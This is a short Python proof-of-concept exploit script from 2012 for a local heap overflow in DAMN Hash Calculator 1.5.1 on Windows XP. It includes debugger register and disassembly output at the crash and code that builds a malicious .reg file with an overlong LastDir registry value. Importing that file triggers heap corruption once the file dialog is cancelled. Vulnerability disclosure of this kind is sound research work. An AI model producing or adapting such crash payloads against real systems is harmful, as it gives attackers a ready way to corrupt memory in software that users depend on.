#!/usr/bin/python
# Exploit Title: DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC
# Version: 1.5.1
# Date: 2012-02-21
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.google.com
# Tested on: Windows XP SP3 Professional German
# Notes: Old but nice software...just to proof it's there :-)
# Howto: Import Reg -> Start App -> Select File -> Cancel without choosing one
#7C9204E6 . 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
#7C9204E9 . 0B47 10 OR EAX,DWORD PTR DS:[EDI+10]
#7C9204EC . A9 00000269 TEST EAX,69020000
#7C9204F1 . 0F85 8BA70300 JNZ ntdll.7C95AC82
#7C9204F7 > 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
#7C9204FA . 8A48 FD MOV CL,BYTE PTR DS:[EAX-3] <-- Crash
#7C9204FD . 83C0 F8 ADD EAX,-8
#7C920500 . F6C1 01 TEST CL,1
#7C920503 . 56 PUSH ESI
#7C920504 . 0F84 92A70300 JE ntdll.7C95AC9C
#7C92050A . F6C1 08 TEST CL,8
#7C92050D . 0F85 B3A70300 JNZ ntdll.7C95ACC6
#EAX 42424245
#ECX 00000008
#EDX 77C31AE8 msvcrt.77C31AE8
#EBX 0040F2F0 DAMN_Has.0040F2F0
#ESP 0012F54C
#EBP 0012F550
#ESI 0041A2DC ASCII "EBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
#EDI 00330000
#EIP 7C9204FA ntdll.7C9204FA
file="poc.reg"
junk1="\x41" * 392
boom="\x45\x42\x42\x42"
junk2="\x43" * 50
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\DAMN\Hash Calculator\Settings]\n"
poc=poc + "\"LastDir\"=\"" + junk1 + boom + junk2 + "\""
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";